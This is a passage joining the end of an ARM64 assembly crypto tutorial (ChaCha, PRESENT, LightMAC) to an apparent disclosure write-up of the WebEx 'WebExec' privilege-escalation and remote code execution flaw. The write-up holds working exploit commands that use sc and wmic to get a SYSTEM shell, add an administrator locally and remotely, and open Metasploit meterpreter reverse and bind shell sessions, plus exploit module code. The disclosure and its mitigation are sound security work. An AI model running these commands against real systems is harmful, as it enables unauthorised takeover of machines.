        X(a,c),X(b,d);
    }
    F(16)x[i]+=s[i];
    s[12]++;
}
void chacha(W l,void*in,void*state){
    unsigned char c[64],*p=in;
    W i,r,*s=state,*k=in;

    if(l) {
      while(l) {
        P(s,(W*)c);
        r=(l>64)?64:l;
        F(r)*p++^=c[i];
        l-=r;
      }
    } else {
      s[0]=0x61707865;s[1]=0x3320646E;
      s[2]=0x79622D32;s[3]=0x6B206574;
      F(12)s[i+4]=k[i];
    }
}

The permutation function makes use of the UBFX instruction.

// ChaCha in ARM64 assembly 
// 348 bytes

 .arch armv8-a
 .text
 .global chacha

 .include "../../include.inc"

P:
    adr     x13, cc_v

    // F(16)x[i]=s[i];
    mov     x8, 0
P0:
    ldr     w14, [x2, x8, lsl 2]
    str     w14, [x3, x8, lsl 2]

    add     x8, x8, 1
    cmp     x8, 16
    bne     P0

    mov     x8, 0
P1:
    // d=v[i%8];
    and     w12, w8, 7
    ldrh    w12, [x13, x12, lsl 1]

    // a=(d&15);b=(d>>4&15);
    // c=(d>>8&15);d>>=12;
    ubfx    w4, w12, 0, 4
    ubfx    w5, w12, 4, 4
    ubfx    w6, w12, 8, 4
    ubfx    w7, w12, 12, 4

    movl    w10, 0x19181410
P2:
    // x[a]+=x[b],
    ldr     w11, [x3, x4, lsl 2]
    ldr     w12, [x3, x5, lsl 2]
    add     w11, w11, w12
    str     w11, [x3, x4, lsl 2]

    // x[d]=R(x[d]^x[a],(r&255)),
    ldr     w12, [x3, x7, lsl 2]
    eor     w12, w12, w11
    and     w14, w10, 255
    ror     w12, w12, w14
    str     w12, [x3, x7, lsl 2]

    // X(a,c),X(b,d);
    stp     w4, w6, [sp, -16]!
    ldp     w6, w4, [sp], 16
    stp     w5, w7, [sp, -16]!
    ldp     w7, w5, [sp], 16

    // r >>= 8
    lsr    w10, w10, 8
    cbnz   w10, P2

    // i++
    add    x8, x8, 1
    // i < 80
    cmp    x8, 80
    bne    P1

    // F(16)x[i]+=s[i];
    mov    x8, 0
P3:
    ldr    w11, [x2, x8, lsl 2]
    ldr    w12, [x3, x8, lsl 2]
    add    w11, w11, w12
    str    w11, [x3, x8, lsl 2]

    add    x8, x8, 1
    cmp    x8, 16
    bne    P3

    // s[12]++;
    ldr    w11, [x2, 12*4]
    add    w11, w11, 1
    str    w11, [x2, 12*4]
    ret
cc_v:
    .2byte 0xC840, 0xD951, 0xEA62, 0xFB73
    .2byte 0xFA50, 0xCB61, 0xD872, 0xE943

    // void chacha(int l, void *in, void *state);
chacha:
    str    x30, [sp, -96]!
    cbz    x0, L2

    add    x3, sp, 16

    mov    x9, 64
L0:
    // P(s,(W*)c);
    bl     P

    // r=(l > 64) ? 64 : l;
    cmp    x0, 64
    csel   x10, x0, x9, ls

    // F(r)*p++^=c[i];
    mov    x8, 0
L1:
    ldrb   w11, [x3, x8]
    ldrb   w12, [x1]
    eor    w11, w11, w12
    strb   w11, [x1], 1

    add    x8, x8, 1
    cmp    x8, x10
    bne    L1

    // l-=r;
    subs   x0, x0, x10
    bne    L0
    beq    L4
L2:
    // s[0]=0x61707865;s[1]=0x3320646E;
    movl   w11, 0x61707865
    movl   w12, 0x3320646E
    stp    w11, w12, [x2]

    // s[2]=0x79622D32;s[3]=0x6B206574;
    movl   w11, 0x79622D32
    movl   w12, 0x6B206574
    stp    w11, w12, [x2, 8]

    // F(12)s[i+4]=k[i];
    mov    x8, 16
    sub    x1, x1, 16
L3:
    ldr    w11, [x1, x8]
    str    w11, [x2, x8]
    add    x8, x8, 4
    cmp    x8, 64
    bne    L3
L4:
    ldr    x30, [sp], 96
    ret

7.14 PRESENT

A block cipher specifically designed for hardware and published in 2007. Why implement a hardware cipher? PRESENT is a 64-bit block cipher that can be implemented reasonably well on any 64-bit architecture. Although the data and key are byte swapped before being processed using the REV instruction, stripping this should not affect security of the cipher.

PRESENT: An Ultra-Lightweight Block Cipher

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(a,b)for(a=0;a<b;a++)

typedef unsigned long long W;
typedef unsigned char B;

B sbox[16] =
  {0xc,0x5,0x6,0xb,0x9,0x0,0xa,0xd,
   0x3,0xe,0xf,0x8,0x4,0x7,0x1,0x2 };

B S(B x) {
  return (sbox[(x&0xF0)>>4]<<4)|sbox[(x&0x0F)];
}

#define rev __builtin_bswap64

void present(void*mk,void*data) {
    W i,j,r,p,t,t2,k0,k1,*k=(W*)mk,*x=(W*)data;
    
    k0=rev(k[0]); k1=rev(k[1]);t=rev(x[0]);
  
    F(i,32-1) {
      p=t^k0;
      F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
      t=0;r=0x0030002000100000;
      F(j,64)
        t|=((p>>j)&1)<<(r&255),
        r=R(r+1,16);
      p =(k0<<61)|(k1>>3);
      k1=(k1<<61)|(k0>>3);
      p=R(p,56);
      ((B*)&p)[0]=S(((B*)&p)[0]);
      k0=R(p,8)^((i+1)>>2);
      k1^=(((i+1)& 3)<<62);
    }
    x[0] = rev(t^k0);
}

The sbox lookup routine (S) uses UBFX and BFI/BFXIL in place of LSR,LSL,AND and ORR. The source requires preprocessing with cpp -E before assembly.

// PRESENT in ARM64 assembly
// 224 bytes

    .arch armv8-a
    .text
    .global present

    #define k  x0
    #define x  x1
    #define r  w2
    #define p  x3
    #define t  x4
    #define k0 x5
    #define k1 x6
    #define i  x7
    #define j  x8
    #define s  x9

present:
    str     lr, [sp, -16]!

    // k0=k[0];k1=k[1];t=x[0];
    ldp     k0, k1, [k]
    ldr     t, [x]

    // only dinosaurs use big endian convention
    rev     k0, k0
    rev     k1, k1
    rev     t, t

    mov     i, 0
    adr     s, sbox
L0:
    // p=t^k0;
    eor     p, t, k0

    // F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
    mov     j, 8
L1:
    bl      S
    ror     p, p, 8
    subs    j, j, 1
    bne     L1

    // t=0;r=0x0030002000100000;
    mov     t, 0
    ldr     r, =0x30201000
    // F(j,64)
    mov     j, 0
L2:
    // t|=((p>>j)&1)<<(r&255),
    lsr     x10, p, j         // x10 = (p >> j) & 1
    and     x10, x10, 1       // 
    lsl     x10, x10, x2      // x10 << r
    orr     t, t, x10         // t |= x10

    // r=R(r+1,16);
    add     r, r, 1           // r = R(r+1, 8)
    ror     r, r, 8

    add     j, j, 1           // j++
    cmp     j, 64             // j < 64
    bne     L2

    // p =(k0<<61)|(k1>>3);
    lsr     p, k1, 3
    orr     p, p, k0, lsl 61

    // k1=(k1<<61)|(k0>>3);
    lsr     k0, k0, 3
    orr     k1, k0, k1, lsl 61

    // p=R(p,56);
    ror     p, p, 56
    bl      S

    // i++
    add     i, i, 1

    // k0=R(p,8)^((i+1)>>2);
    lsr     x10, i, 2
    eor     k0, x10, p, ror 8

    // k1^= (((i+1)&3)<<62);
    and     x10, i, 3
    eor     k1, k1, x10, lsl 62

    // i < 31
    cmp     i, 31
    bne     L0

    // x[0] = t ^= k0
    eor     p, t, k0
    rev     p, p
    str     p, [x]

    ldr     lr, [sp], 16
    ret

S:
    ubfx    x10, p, 0, 4              // x10 = (p & 0x0F)
    ubfx    x11, p, 4, 4              // x11 = (p & 0xF0) >> 4

    ldrb    w10, [s, w10, uxtw 0]     // w10 = s[w10]
    ldrb    w11, [s, w11, uxtw 0]     // w11 = s[w11]

    bfi     p, x10, 0, 4              // p[0] = ((x11 << 4) | x10)
    bfi     p, x11, 4, 4

    ret
sbox:
    .byte 0xc, 0x5, 0x6, 0xb, 0x9, 0x0, 0xa, 0xd
    .byte 0x3, 0xe, 0xf, 0x8, 0x4, 0x7, 0x1, 0x2

7.15 LIGHTMAC

A Message Authentication Code using block ciphers. Designed by Atul Luykx, Bart Preneel, Elmar Tischhauser, and Kan Yasuda. The version shown here only supports ciphers with a 64-bit block size and 128-bit key. E is defined as a block cipher. For this code, one could use XTEA, SPECK-64/128 or PRESENT. If BLK_LEN and TAG_LEN are changed to 16, it will support 128-bit ciphers like AES-128, CHASKEY, CHAM-128/128, SPECK-128/256, LEA-128, NOEKEON. Based on the parameters used here, the largest message length can be 1,792 bytes. For a shellcode trasmitting small packets, this should be sufficient.

A MAC Mode for Lightweight Block Ciphers

To improve upon the parameters used for 64-bit block ciphers, read the following paper.

Blockcipher-based MACs: Beyond the Birthday Bound without Message Length

#define CTR_LEN     1 // 8-bits
#define BLK_LEN     8 // 64-bits
#define TAG_LEN     8 // 64-bits
#define BC_KEY_LEN 16 // 128-bits

#define M_LEN         BLK_LEN-CTR_LEN

void present(void*mk,void*data);
#define E present

#define F(a,b)for(a=0;a<b;a++)
typedef unsigned int W;
typedef unsigned char B;

// max message for current parameters is 1792 bytes
void lm(B*b,W l,B*k,B*t) {
    int i,j,s;
    B   m[BLK_LEN];

    // initialize tag T
    F(i,TAG_LEN)t[i]=0;

    for(s=1,j=0; l>=M_LEN; s++,l-=M_LEN) {
      // add 8-bit counter S 
      m[0] = s;
      // add bytes to M 
      F(j,M_LEN)
        m[CTR_LEN+j]=*b++;
      // encrypt M with K1
      E(k,m);
      // update T
      F(i,TAG_LEN)t[i]^=m[i];
    }
    // copy remainder of input
    F(i,l)m[i]=b[i];
    // add end bit
    m[i]=0x80;
    // update T 
    F(i,l+1)t[i]^=m[i];
    // encrypt T with K2
    k+=BC_KEY_LEN;
    E(k,t);
}

No assembly for this right now, but feel free to have a go!

8. Summary

ARM expects their “Deimos” design scheduled for 2019 and “Hercules” for 2020 to outperform any laptop class CPU from Intel. The A76 does not support A32 or T32, and it’s highly likely the next designs won’t either. The ARM64 instruction set is almost perfect. The only minor thing that annoys me is how the x30 register (Link Register) must be saved across calls to subroutines. There’s also no rotate left or modulus instructions that would be useful.

All code shown here can be found in this github repo.

Technical Rundown of WebExec

This is a technical rundown of a vulnerability that we’ve dubbed «WebExec».

Картинки по запросу WebExecThe summary is: a flaw in WebEx’s WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That’s right: this client-side application that doesn’t listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it’s patched.

High level details and FAQ at https://webexec.org! Below is a technical writeup of how we found the bug and how it works.

Credit

This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.

If you have any questions or concerns, I made an email alias specifically for this issue: info@webexec.org!

You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!

Intro

During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!

As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class «thank you for your service», because we can, and are crossing our fingers that more are out there!

The actual version of WebEx is the latest client build as of August, 2018: Version 3211.0.1801.2200, modified 7/19/2018 SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We’ve tested some older and newer versions since then, and they are still vulnerable.

WebEx released patch on October 3, but requested we maintain embargo until they release their advisory. You can find all the patching instructions on webexec.org.

The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you’re concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:

c:\>sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.

Privilege Escalation

What initially got our attention is that folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called «webexservice» that can be started and stopped by anybody. That’s not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that’s SYSTEM). That’s an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.

Due to the application whitelisting, however, on this particular assessment we couldn’t simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.

One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it’s a service, it runs with the working directory c:\windows\system32, and we couldn’t write to that folder!

At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let’s take a look

Deep dive into WebExService.exe

It’s not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA is the strings windows (shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:

  .rdata:00405438 ; wchar_t aSCreateprocess
  .rdata:00405438 aSCreateprocess:                        ; DATA XREF: sub_4025A0+1E8o
  .rdata:00405438                 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0

I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:

  .text:0040254E                 push    [ebp+lpProcessInformation] ; lpProcessInformation
  .text:00402554                 push    [ebp+lpStartupInfo] ; lpStartupInfo
  .text:0040255A                 push    0               ; lpCurrentDirectory
  .text:0040255C                 push    0               ; lpEnvironment
  .text:0040255E                 push    0               ; dwCreationFlags
  .text:00402560                 push    0               ; bInheritHandles
  .text:00402562                 push    0               ; lpThreadAttributes
  .text:00402564                 push    0               ; lpProcessAttributes
  .text:00402566                 push    [ebp+lpCommandLine] ; lpCommandLine
  .text:0040256C                 push    0               ; lpApplicationName
  .text:0040256E                 push    [ebp+phNewToken] ; hToken
  .text:00402574                 call    ds:CreateProcessAsUserW

The W on the end refers to the UNICODE («wide») version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you’ll find everything you need to know.

In any case, the two most important arguments here are hToken — the user it creates the process as — and lpCommandLine — the command that it actually runs. Let’s take a look at each!

hToken

The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what’s going on. Trying to understand what code’s doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you’ll see shortly.

At the top of the function, we see:

  .text:0040241E                 call    ds:CreateToolhelp32Snapshot

This is a normal way to search for a specific process in Win32 — it creates a «snapshot» of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).

Based simply on knowledge of the APIs, we can deduce that it’s searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:

  .text:00402480                 lea     eax, [ebp+Str1]
  .text:00402486                 push    offset Str2     ; "winlogon.exe"
  .text:0040248B                 push    eax             ; Str1
  .text:0040248C                 call    ds:_wcsicmp
  .text:00402492                 add     esp, 8
  .text:00402495                 test    eax, eax
  .text:00402497                 jnz     short loc_4024BE

Specifically, it’s comparing the name of each process to «winlogon.exe» — so it’s trying to get a handle to the «winlogon.exe» process!

If we continue down the function, you’ll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That’s another common sequence of API calls — it’s how a process can get a handle to another process’s token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.

To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!

An interesting takeaway here is that I didn’t really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!

lpCommandLine

This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don’t be discouraged by this quick summary — I’m skipping an awful lot of dead ends and validation to keep just to the interesting bits.

One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I’d have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea — I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:

C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
[...]

You may need to configure Event Viewer to show everything in the Application logs, I didn’t really know what I was doing, but eventually I found a log entry for WebExService.exe:

  ExecuteServiceCommand::Not enough command line arguments to execute a service command.

That’s handy! Let’s search for that in IDA (alt+T)! That leads us to this code:

  .text:004027DC                 cmp     edi, 3
  .text:004027DF                 jge     short loc_4027FD
  .text:004027E1                 push    offset aExecuteservice ; &quot;ExecuteServiceCommand&quot;
  .text:004027E6                 push    offset aSNotEnoughComm ; &quot;%s::Not enough command line arguments t&quot;...
  .text:004027EB                 push    2               ; wType
  .text:004027ED                 call    sub_401770

A tiny bit of actual reversing: compare edit to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn’t take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let’s try it:

C:\Users\ron>sc start webexservice a b

[...]

Then check Event Viewer again:

  ExecuteServiceCommand::Service command not recognized: b.

Don’t you love verbose error messages? It’s like we don’t even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:

  .text:00402830 loc_402830:                             ; CODE XREF: sub_4027D0+3Dj
  .text:00402830                 push    dword ptr [esi+8]
  .text:00402833                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:00402838                 push    offset aSServiceComman ; "%s::Service command not recognized: %ls"...
  .text:0040283D                 push    2               ; wType
  .text:0040283F                 call    sub_401770

If we scroll up just a bit to determine how we get to that error message, we find this:

  .text:004027FD loc_4027FD:                             ; CODE XREF: sub_4027D0+Fj
  .text:004027FD                 push    offset aSoftwareUpdate ; "software-update"
  .text:00402802                 push    dword ptr [esi+8] ; lpString1
  .text:00402805                 call    ds:lstrcmpiW
  .text:0040280B                 test    eax, eax
  .text:0040280D                 jnz     short loc_402830 ; <-- Jumps to the error we saw
  .text:0040280F                 mov     [ebp+var_4], eax
  .text:00402812                 lea     edx, [esi+0Ch]
  .text:00402815                 lea     eax, [ebp+var_4]
  .text:00402818                 push    eax
  .text:00402819                 push    ecx
  .text:0040281A                 lea     ecx, [edi-3]
  .text:0040281D                 call    sub_4025A0

The string software-update is what the string is compared to. So instead of b, let’s try software-update and see if that gets us further! I want to once again point out that we’re only doing an absolutely minimum amount of reverse engineering at the assembly level — we’re basically entirely using API calls and error messages!

Here’s our new command:

C:\Users\ron>sc start webexservice a software-update

[...]

Which results in the new log entry:

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Exception code: 0xc0000005
  Fault offset: 0x00002643
  Faulting process id: 0x654
  Faulting application start time: 0x01d42dbbf2bcc9b8
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Report Id: 31555e60-99af-11e8-8391-0800271677bd

Uh oh! I’m normally excited when I get a process to crash, but this time I’m actually trying to use its features! What do we do!?

First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you’ll know that it’s a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).

The first thing I tried was the brute-force approach: let’s add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren’t present.

So I started the service with the following commandline:

C:\Users\ron>sc start webexservice a software-update a b c d e f

[...]

That led to a new crash, so progress!

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
  Exception code: 0x40000015
  Fault offset: 0x000a7676
  Faulting process id: 0x774
  Faulting application start time: 0x01d42dbc22eef30e
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
  Report Id: 60a0439c-99af-11e8-8391-0800271677bd

I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard — probably a failed assert()? We don’t really have any output, so it’s hard to say.

This one took me awhile, and this is where I’ll skip the deadends and debugging and show you what worked.

Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you’ll see this function call:

  .text:0040281D                 call    sub_4025A0

If you jump into that function (double click), and scroll down a bit, you’ll see:

  .text:00402616                 mov     [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"

I used the most advanced technique in my arsenal here and googled that string. It turns out that it’s a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That’s a great sign, it means we’re almost there!

A little bit after, in the same function, we see this code:

  .text:004026A2                 push    eax             ; EndPtr
  .text:004026A3                 push    esi             ; Str
  .text:004026A4                 call    ds:wcstod ; <--
  .text:004026AA                 add     esp, 8
  .text:004026AD                 fstp    [esp+0B4h+var_90]
  .text:004026B1                 cmp     esi, [esp+0B4h+EndPtr+4]
  .text:004026B5                 jnz     short loc_4026C2
  .text:004026B7                 push    offset aInvalidStodArg ; &quot;invalid stod argument&quot;
  .text:004026BC                 call    ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)

The line with an error — wcstod() is close to where the abort() happened. I’ll spare you the debugging details — debugging a service was non-trivial — but I really should have seen that function call before I got off track.

I looked up wcstod() online, and it’s another of Microsoft’s cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don’t know exactly what it does from there, but we can assume that it’s looking for a number somewhere.

This is where my advice becomes «be lucky». The reason is, the only number that will actually work here is «1». I don’t know why, or what other numbers do, but I ended up calling the service with the commandline:

C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6

And checked the event log:

  StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).

That looks awfully promising! I changed 2 to an actual process:

  C:\Users\ron>sc start webexservice a software-update 1 calc c d e f

And it opened!

C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K

It actually runs with a GUI, too, so that’s kind of unnecessary. I could literally see it! And it’s running as SYSTEM!

Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!

Local exploit

The simplest exploit is to start cmd.exe with wmic.exe:

C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"

That opens a GUI cmd.exe instance as SYSTEM:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

If we can’t or choose not to open a GUI, we can also escalate privileges:

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add
[...]

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron
testuser

And this all works as an unprivileged user!

Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:

meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2
SESSION => 2

msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST 172.16.222.1
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on 172.16.222.1:9001
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 172.16.222.132
[*] Meterpreter session 2 opened (172.16.222.1:9001 -> 172.16.222.132:49574) at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Remote exploit

We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that’s done, you can use the exact same command against the remote host:

c:\>sc \\10.0.0.0 start webexservice a software-update 1 net localgroup administrators testuser /add

The command will run (and a GUI will even pop up!) on the other machine.

Remote exploitation with Metasploit

To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.

Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:

msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110
RHOSTS => 192.168.56.100-110
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-] 192.168.56.105:445    - No service handle retrieved
[+] 192.168.56.105:445    - Command completed!
[-] 192.168.56.103:445    - No service handle retrieved
[+] 192.168.56.103:445    - Command completed!
[+] 192.168.56.104:445    - Command completed!
[+] 192.168.56.101:445    - Command completed!
[*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed

And here’s the full exploit module:

msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/smb/webexec) > exploit

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'...
[*] 192.168.56.101:445 - Command Stager progress -   0.96% done (999/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
...
[*] 192.168.56.101:445 - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Sending stage (179779 bytes) to 192.168.56.101

The actual implementation is mostly straight forward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a meterpreter .exe uploaded to execute it?

I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexecinstead. You lose the magic of WebExec!

After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the command to an .exe file to the filesystem. Using the .vbs flavor of staging, it would write a Base64-encoded file to the disk, then a .vbs stub to decode and execute it!

There are several problems, however:

  • The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
  • CmdStager uses %TEMP% as a temporary directory, but our exploit doesn’t expand paths
  • WebExecService seems to escape quotation marks with a backslash, and I’m not sure how to turn that off

The first two issues could be simply worked around by adding options (once I’d figured out the options to use):

wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05
  execute_cmdstager(opts)
end

execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:

# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finangling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, "").chars.map do |c|
      "Chr(#{c.ord})"
    end.join('+')
  end

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)
end

First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to characters 1 — 1 of the string «A». Or the empty string!

Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn’t use &, because that’s already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.

And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.

In a targeted attack, it’s obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!

Checking for the patch

This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!

The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!

There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it’s no good as a script!

In order to exploit this, you have to be able to get a handle to the service-controlservice (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either OK or ACCESS_DENIED, we know it worked!

Here’s the important code from the Nmap checker module we developed:

-- Create a test service that we can query
